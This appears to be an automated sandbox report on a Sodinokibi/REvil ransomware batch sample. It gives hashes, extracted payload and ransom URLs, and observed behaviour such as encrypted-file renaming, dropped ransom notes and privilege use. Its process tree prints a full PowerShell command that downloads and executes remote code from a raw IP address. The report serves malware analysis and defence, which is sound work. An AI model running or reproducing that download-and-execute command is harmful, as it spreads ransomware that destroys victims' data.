Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
21-08-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
59757318723e5bcf0dc7acb1e50a016f.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
59757318723e5bcf0dc7acb1e50a016f.bat
Resource
win10v200722
General
-
Target
59757318723e5bcf0dc7acb1e50a016f.bat
-
Size
220B
-
MD5
3ce440975e6a9f2c1b282370f89d2c24
-
SHA1
78649de7adceedaf9701fee3ae23b048df1ae0fb
-
SHA256
32fd1da6b6ea751505cb7a81d90fc2f0925a62a78c917262e96fee968b627474
-
SHA512
179853fc7cb0339b71778d815c0c2834027bc942a70a832149ce62ce0bd05f99222032affe9c07e01542071dc2ca11343d45ee29945bc6d19cee9d4679953188
Malware Config
Extracted
http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f
Extracted
C:\atmf00-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C1895CC9C2E527E
http://decryptor.cc/2C1895CC9C2E527E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1020 powershell.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\LockBackup.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\RedoHide.tiff powershell.exe File renamed C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.atmf00 powershell.exe File renamed C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.atmf00 powershell.exe File opened for modification \??\c:\users\admin\pictures\ResolveFind.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.atmf00 powershell.exe File renamed C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.atmf00 powershell.exe File renamed C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.atmf00 powershell.exe File renamed C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.atmf00 powershell.exe File renamed C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.atmf00 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c15jqxwg56.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\atmf00-readme.txt powershell.exe File opened for modification \??\c:\program files\ImportCopy.asx powershell.exe File opened for modification \??\c:\program files\InitializeReceive.wmf powershell.exe File opened for modification \??\c:\program files\ResumeOptimize.docm powershell.exe File opened for modification \??\c:\program files\SaveInvoke.i64 powershell.exe File opened for modification \??\c:\program files\SuspendMerge.3gp powershell.exe File created \??\c:\program files\atmf00-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveMove.M2TS powershell.exe File opened for modification \??\c:\program files\GroupConfirm.mpeg3 powershell.exe File opened for modification \??\c:\program files\InitializeResume.emz powershell.exe File opened for modification \??\c:\program files\OutSet.rtf powershell.exe File opened for modification \??\c:\program files\ShowPing.3g2 powershell.exe File opened for modification \??\c:\program files\BlockConvertTo.crw powershell.exe File opened for modification \??\c:\program files\EnableConnect.m4v powershell.exe File opened for modification \??\c:\program files\RegisterDebug.asp powershell.exe File opened for modification \??\c:\program files\UnpublishHide.doc powershell.exe File opened for modification \??\c:\program files\UnpublishStop.wmv powershell.exe File opened for modification \??\c:\program files\AssertSuspend.avi powershell.exe File opened for modification \??\c:\program files\DisableTest.mpeg powershell.exe File opened for modification \??\c:\program files\FormatOut.jtx powershell.exe File opened for modification \??\c:\program files\GrantClear.vsdm powershell.exe File opened for modification \??\c:\program files\DisconnectUnblock.raw powershell.exe File opened for modification \??\c:\program files\PingUnregister.clr powershell.exe File opened for modification \??\c:\program files\ReadDisable.inf powershell.exe File opened for modification \??\c:\program files\SelectRedo.ADT powershell.exe File opened for modification \??\c:\program files\SplitMount.ini powershell.exe File opened for modification \??\c:\program files\SuspendConvertFrom.vdw powershell.exe File opened for modification \??\c:\program files\CheckpointDismount.vst powershell.exe File opened for modification \??\c:\program files\CompleteMount.txt powershell.exe File opened for modification \??\c:\program files\DebugConvertFrom.pcx powershell.exe File opened for modification \??\c:\program files\MeasureRestore.ppsm powershell.exe File opened for modification \??\c:\program files\MeasureSkip.eps powershell.exe File opened for modification \??\c:\program files\LimitUse.i64 powershell.exe File opened for modification \??\c:\program files\OutRevoke.pub powershell.exe File opened for modification \??\c:\program files\DebugUninstall.ogg powershell.exe File opened for modification \??\c:\program files\InstallEdit.txt powershell.exe File opened for modification \??\c:\program files\LimitShow.aifc powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeBackupPrivilege 3880 vssvc.exe Token: SeRestorePrivilege 3880 vssvc.exe Token: SeAuditPrivilege 3880 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3984 wrote to memory of 1020 3984 cmd.exe powershell.exe PID 3984 wrote to memory of 1020 3984 cmd.exe powershell.exe PID 3984 wrote to memory of 1020 3984 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\59757318723e5bcf0dc7acb1e50a016f.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f');Invoke-CIGRXCCUEVHBH;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3880